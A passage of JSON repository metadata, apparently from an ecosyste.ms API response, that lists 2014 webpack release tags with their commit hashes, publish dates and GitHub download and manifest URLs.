/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G